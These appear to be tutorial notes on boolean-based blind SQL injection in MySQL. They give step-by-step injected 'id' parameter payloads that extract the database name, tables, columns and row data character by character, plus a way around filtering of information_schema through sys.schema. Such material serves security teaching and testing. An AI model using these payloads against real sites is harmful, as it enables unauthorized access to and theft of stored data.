Common functions
- substr(str,from,length)
  Returns the substring of str of length `length` starting at index `from`. The first character has index 1.
- length(str)
  Returns the length of the string.
- ASCII(char)
  Returns the ASCII code of char; often used together with substr.
Injection steps
Enter an id to query. A successful query returns success; a failed one returns error.
1. Find the length of the database name
?id=1 and length(database())=i
# i is the guessed length
2. Find the database name
?id=1 and substr(database(),j,1)='a'
...
?id=1 and substr(database(),j,1)='z'
# After each character is found, move j forward by 1 until it reaches the database name length i
3. Determine the number of tables in the current database
?id=1 and (select COUNT(*) from information_schema.tables where table_schema=database())=k
# k is the number of tables
Use sys.schema when information_schema is filtered
- sys.schema was added in MySQL 5.7; its base data comes from the performance_schema and information_schema databases, and it stores no data of its own
?id=1 and (select COUNT(*) from sys.schema_auto_increment_columns where table_schema=database())=k
# or
?id=1 and (select COUNT(*) from sys.schema_table_statistics_with_buffer where table_schema=database())=k
4. Find the table name length
?id=1 and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=m
# the table name length is m
# takes the single table starting at offset 0
- limit usage
limit a,b: b rows starting at offset a (0-based), b rows in total
5. Find the table name
?id=1 and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='a'
...
?id=1 and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),m,1)='z'
The same applies to the other tables.
6. Find the number of columns in the table
?id=1 and (select COUNT(*) from information_schema.columns where table_schema=database() and table_name='table_name')=n
# n columns in total
7. Find the column name length
?id=1 and (select length(column_name) from information_schema.columns where table_name='table_name' limit 0,1)=v
# the column name length is v; limit 0,1 keeps the subquery to a single row, as in step 4
8. Find the column names
?id=1 and substr((select column_name from information_schema.columns where table_name='table_name' limit 0,1),1,1)='a'
...
?id=1 and substr((select column_name from information_schema.columns where table_name='table_name' limit 0,1),v,1)='z'
9. Extract the data
?id=1 and substr((select column_name from table_name limit 0,1),1,1)='a'
...
?id=1 and substr((select column_name from table_name limit 0,1),1,1)='z'
# limit 0,1 keeps the subquery to one row; advance the position as in step 5 to read the remaining characters